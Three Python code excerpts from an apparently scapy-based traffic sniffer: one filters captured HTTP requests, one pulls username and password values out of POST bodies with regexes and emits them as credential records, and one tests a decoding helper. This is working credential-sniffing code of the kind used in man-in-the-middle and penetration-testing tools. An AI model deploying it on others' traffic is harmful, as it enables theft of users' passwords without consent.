Beispiel #1
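    def filterPackets(self, pkt):
        """Handle one captured packet and emit a record for HTTP requests.

        Packets without an ``http.HTTPRequest`` layer are ignored. For the
        rest, a ``urlsCap`` record holding the IP and HTTP field dicts is
        passed through ``decoded`` and emitted on ``self.output``. POST
        requests are first handed to ``getCredentials_POST`` together with
        the raw request body.

        Side effects: when the packet carries TCP, Raw and IP layers,
        ``self.sport``, ``self.dport``, ``self.src_ip_port`` and
        ``self.dst_ip_port`` are overwritten with this packet's endpoints.

        Args:
            pkt: packet object exposing ``haslayer``/``getlayer`` and layer
                indexing (presumably a scapy packet -- confirm).
        """
        if not pkt.haslayer(http.HTTPRequest):
            return
        try:
            if pkt.haslayer(TCP) and pkt.haslayer(Raw) and pkt.haslayer(IP):
                self.dport = pkt[TCP].dport
                self.sport = pkt[TCP].sport
                self.src_ip_port = str(pkt[IP].src) + ":" + str(self.sport)
                self.dst_ip_port = str(pkt[IP].dst) + ":" + str(self.dport)

            http_layer = pkt.getlayer(http.HTTPRequest)
            ip_layer = pkt.getlayer(IP)
            # Header fields are bytes here, hence the explicit UTF-8 decode.
            if str(http_layer.fields["Method"], "utf-8") == "POST":
                # A POST without a Raw layer raises on ``.load`` and the
                # whole packet, including the urlsCap record, is dropped.
                self.getCredentials_POST(
                    pkt.getlayer(Raw).load,
                    http_layer.fields["Host"],
                    http_layer.fields["Headers"],
                    self.dst_ip_port,
                    self.src_ip_port,
                    {
                        "IP": ip_layer.fields,
                        "Headers": http_layer.fields
                    },
                )
            # NOTE(review): the record carries the complete request field
            # dict; consumers of self.output should treat it as sensitive.
            data = {
                "urlsCap": {
                    "IP": ip_layer.fields,
                    "Headers": http_layer.fields
                }
            }
            with decoded(data) as data_decoded:
                self.output.emit(data_decoded)
        except Exception:
            # Deliberate best-effort: a partial or malformed packet (no IP
            # layer, missing field, undecodable bytes) is skipped silently.
            # Exception instead of a bare except, so KeyboardInterrupt and
            # SystemExit still propagate and the capture can be stopped.
            pass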
Beispiel #2
 def getCredentials_POST(self, payload, url, header, dport, sport, pkt):
     """Emit a ``POSTCreds`` record when a body has user and password fields.

     The body is decoded as UTF-8 and searched with two regexes for
     ``key=value`` pairs. Nothing is emitted unless both a user-like and a
     password-like key are found. Only the first match of each is reported.
     Values are taken as they appear in the body, with no URL-unquoting.

     The patterns are unanchored, so they also match the tail of a longer
     parameter name (``[Nn]ame`` matches inside ``filename=``).

     Args:
         payload: request body as bytes; non-UTF-8 input raises
             ``UnicodeDecodeError``.
         url: value reported under ``"Url"`` after ``str()``.
             NOTE(review): if this is bytes, ``str()`` yields its repr --
             confirm against the caller.
         header: unused in this method.
         dport: second half of the ``"Destination"`` string.
         sport: first half of the ``"Destination"`` string.
         pkt: object stored unchanged under ``"Packets"``.
     """
     user_pattern = ("([Ee]mail|%5B[Ee]mail%5D|[Uu]ser|[Uu]sername|"
                     "[Nn]ame|[Ll]ogin|[Ll]og|[Ll]ogin[Ii][Dd])=([^&|;]*)")
     pass_pattern = ("([Pp]assword|[Pp]ass|[Pp]asswd|[Pp]wd|[Pp][Ss][Ww]|"
                     "[Pp]asswrd|[Pp]assw|%5B[Pp]assword%5D)=([^&|;]*)")
     body_text = str(payload, "utf-8")
     user_hits = re.findall(user_pattern, body_text)
     pass_hits = re.findall(pass_pattern, body_text)

     # Both kinds of field must be present; otherwise there is nothing to do.
     if not user_hits or not pass_hits:
         return

     # Each hit is a (key, value) tuple; keep the value of the first one.
     first_user = user_hits[0][1]
     first_pass = pass_hits[0][1]
     record = {
         "POSTCreds": {
             "Url": str(url),
             "Destination": "{}/{}".format(sport, dport),
             "Packets": pkt,
             "Data": {
                 "User": first_user,
                 "Pass": first_pass,
                 "Payload": payload,
             },
         }
     }
     with decoded(record) as data_decoded:
         self.output.emit(data_decoded)
Beispiel #3
    def test_decoded_data(self):
        """Check that ``decoded`` turns the sample record into ``result``.

        The fixture mimics the IP and HTTP field dicts of a captured GET
        request, with text values given as bytes. The expected value is the
        module-level ``result``, defined outside this method.
        """
        global result
        ip_fields = {
            "version": 4,
            "src": b"10.0.0.21",
            "dst": b"216.58.202.227",
            "ihl": 5,
            "tos": 0,
        }
        header_fields = {
            "Connection": b"Keep-Alive",
            "Method": b"GET",
            "Path": b"/generate_204",
            "Http-Version": b"HTTP/1.1",
        }
        data = {"IP": ip_fields, "Headers": header_fields}

        # decoded() is expected to yield the same structure with the bytes
        # values converted to str (exact codec is not visible here).
        with decoded(data) as data_decoded:
            self.data_decoded = data_decoded

        self.assertEqual(result, self.data_decoded)